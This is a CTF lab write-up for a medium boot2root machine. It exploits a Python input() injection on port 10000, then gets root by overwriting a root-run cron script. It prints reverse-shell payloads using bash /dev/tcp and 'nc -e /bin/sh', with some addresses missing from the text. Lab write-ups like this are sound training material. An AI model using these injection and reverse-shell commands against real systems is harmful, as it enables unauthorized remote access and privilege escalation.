boot2root machine for FIT and bsides Guatemala CTF.

Not much to go on here. This one is Medium rated. Let’s begin.


Nmap says we’ve got two ports only - SSH on 22 and a mystery port on 10000.

Visiting port 10000 in Firefox presents the following message:

Private 0days
Please enter number of exploits to send??: Traceback (most recent call last): File “./”, line 6, in num_exploits = int(input(' Please enther number of exploits to send??: ')) File "", line 1, in NameError: name 'GET' is not defined

So it looks like a python application of some sort that we don’t interact with via a brower. We’ll move on to netcat.


root@kali:/opt/tryhackme/develpy# nc 10000

        Private 0days

 Please enther number of exploits to send??: 1

Exploit started, attacking target (
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.011 ms

So what’s going on here is we enter some number, and we get that number of pings. Now we have to break it.

Breaking it

I tried a few different things; some things produce this message as part of the error:

num_exploits = int(input(‘ Please enther number of exploits to send??: ‘))

So we can see the value being input being cast to an integer with int - actually we saw this earlier when we visited the port in the browser. Trying a few different data types produces more error messages, indicating it wants a string or integer as the expected input. After a bit I tried this:

__import__('os').system('bash -i >& /dev/tcp/ 0>&1')#

Which prompted this error:

sh: 1: Syntax error: Bad fd number

And this indicated that the command was being executed by the system but not being understood (using sh not bash). The next one I tried was:

__import__('os').system('nc -e /bin/sh 1234')

And I was on the box.

On the box

Our user is called king. Checking /etc/crontab we can see:

          • root cd /home/king/ && bash

So we have root running a script in our home directory. Nice. We can overwrite the script with our own - I deleted the original and replaced it:

king@ubuntu:~$ echo '#!/bin/bash' >>

king@ubuntu:~$ echo 'nc -e /bin/sh 1235' >>

Since we know this shell already works, we might as well user it again with a different port number, right? With a new listener we get a root shell and it’s all done; thanks for playing.